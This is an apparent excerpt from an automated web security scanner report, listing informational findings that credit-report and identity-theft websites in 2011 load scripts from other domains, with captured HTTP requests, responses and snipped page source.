Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+time-out; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:36:22 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=2a0ea07e078d45acbe75184e6bfdf00f; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:22 GMT
ETag: "pvfb53f30d38bdcd61e442d0aa9c8449f1"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U263B78D6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Exper
...[SNIP]...
<div id="adbanners">
                                   <SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.150104.8951464991521/B4937682.33;sz=180x150;ord=[timestamp]?">
                                   </SCRIPT>
...[SNIP]...
</NOSCRIPT>

                                   <SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.150104.8951464991521/B4937682.34;sz=180x150;ord=[timestamp]?">
                                   </SCRIPT>
...[SNIP]...
</NOSCRIPT>

                                   <SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.150104.8951464991521/B4937682.35;sz=180x150;ord=[timestamp]?">
                                   </SCRIPT>
...[SNIP]...
<li id="verisign"><script src=https://seal.verisign.com/getseal?host_name=www.creditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.220. http://www.customscoop.com/free-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customscoop.com
Path:   /free-trial

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /free-trial?ctt_id=8402315&ctt_adnw=Google&ctt_ch=ps&ctt_entity=tc&ctt_cli=8x16337x264583x1756421&ctt_kw=reputation%20monitoring&ctt_adid=6182319610&ctt_nwtype=search&_kk=reputation%20monitoring&_kt=95b73c39-c203-439c-bdad-698c73ef9306&gclid=CKah4dm1tqgCFQFM5QodD3KkCw HTTP/1.1
Host: www.customscoop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:31 GMT
Server: Apache
X-Pingback: http://www.customscoop.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 49299


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta property="fb:admins" content="519362010
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>

<!-- Salesforce Tracking Code -->
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

24.221. https://www.econsumer.equifax.com/otc/personalInfo.ehtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /otc/personalInfo.ehtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /otc/personalInfo.ehtml HTTP/1.1
Host: www.econsumer.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=857e5247922609777fdaaf17d37b; style=null; hbx.hc3=null; JROUTE=ush2; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; CP=null*; hbx.timestamp=1303614816593; hbx.hc2=CJ; foresee.alive=1303614816186;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:46 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=886e62818fa6c33fbbcc7ef59ff42; Path=/otc; Secure
Set-cookie: JROUTE=iFbh; Path=/otc; Secure
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Personal
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
   

           <script src="https://equfx.netmng.com/?aid=089" type="text/javascript" defer="defer"></script>
...[SNIP]...

24.222. https://www.econsumer.equifax.com/otc/sitepage.ehtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /otc/sitepage.ehtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /otc/sitepage.ehtml HTTP/1.1
Host: www.econsumer.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=857e5247922609777fdaaf17d37b; style=null; hbx.hc3=null; JROUTE=ush2; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; CP=null*; hbx.timestamp=1303614816593; hbx.hc2=CJ; foresee.alive=1303614816186;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:34 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=886e3401ea8f485794cff931ce85e; Path=/otc; Secure
Set-cookie: JROUTE=13w-; Path=/otc; Secure
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Personal
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
   

           <script src="https://equfx.netmng.com/?aid=089" type="text/javascript" defer="defer"></script>
...[SNIP]...

24.223. https://www.experiandirect.com/triplealert/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=657900&bcd= HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=cdcegvypn3iopdndfus34r45; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303676208988%7C1398284208988%3B%20s_lv_s%3DFirst%2520Visit%7C1303678008988%3B%20sc_dl%3D1%7C1303678023924%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%7C1303678023929%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303678023932%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D657900%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Si_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:16:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd+Order1; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:16:52 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=b9e50f6aa22f42ca81c3b1ebd91be07d; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...
<div align="center"><script src=https://seal.verisign.com/getseal?host_name=www.freecreditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.224. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /widgets/like.php?href=http://www.pedigreedatabase.com/german_shepherd_dog/forum.read?mnr=113206&layout=standard&show_faces=true&width=450&action=recommend&%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20font&colorscheme=light&height=80 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.51.101
X-Cnection: close
Date: Sun, 24 Apr 2011 16:56:44 GMT
Elapsed: 0.049
Content-Length: 8583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/PPmOtH4sM2V.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

24.225. http://www.fightidentitytheft.com/credit-monitoring.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /credit-monitoring.html HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=8d6f98f4d20d1ff037ac5b3e30142094; expires=Tue, 17-May-2011 23:19:27 GMT; path=/; domain=.fightidentitytheft.com
Last-Modified: Sun, 24 Apr 2011 19:17:59 GMT
ETag: "ebec15374e4c8c133be90bb1430afb94"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 25663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=spiffyman"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=spiffyman"></script>
...[SNIP]...

24.226. http://www.freecreditreport.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?sc=670839&bcd=daB7KMjz&mkwid=sdaB7KMjz&pcrid=6283273924&kwid=credit%20monitoring HTTP/1.1
Host: www.freecreditreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DA3ED6851D2621-40000127A02824B7[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=sqbvmyiqvnixtaqy5k0d4yqf; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:54:36 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=1062; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=7135d595e6d7454c98dae899d7749053; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:54:36 GMT
ETag: "pv8c989b447d4b448d39e7b7d5f33f7c53"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70584.RA0.G11456.U2FCB3501].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 14619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Credit Report and Credit History | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Micr
...[SNIP]...
<li><script src=https://seal.verisign.com/getseal?host_name=www.freecreditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

24.227. http://www.freecreditscore.com/dni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /dni/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd= HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+default; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:53:22 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 19:53:22 GMT
ETag: "pv59c36d169d599af69881e879374da22d"
Cache-Control: private
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U7D2DD613].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 13546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<base href="http://www.freecreditscore.com/dni/" />
<title>Cre
...[SNIP]...
<li class="code0"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.freecreditscore.com&amp;size=M&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
<!-- Start of ECD-Pixel Tag -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk">
</script>
...[SNIP]...

24.228. https://www.freecreditscore.com/dni/sign-in.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/sign-in.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dni/sign-in.aspx HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage11&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; NavigationPath=default; LastVisitDate=4/24/2011 5:34:46 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+sign-in; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 6:25:26 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:25:26 GMT
ETag: "pvdcb29fc310c6ce2e8ac88af3a0c302e2"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U24A69375].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           My Credit Score - Member Login | Free Credit Score
       </title>
   
...[SNIP]...
<!-- Advertiser 'ConsumerInfo.com Inc.', Conversion tracking 'FCS 932 OOW Conversion' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
               <script src="https://ad.yieldmanager.com/pixel?id=973088&t=1" type="text/javascript"></script>
...[SNIP]...
<li id="verisign"><script src=https://seal.verisign.com/getseal?host_name=www.freecreditscore.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.229. http://www.hellonetwork.com/ypsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoring;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:56:39 GMT
Content-Length: 50298

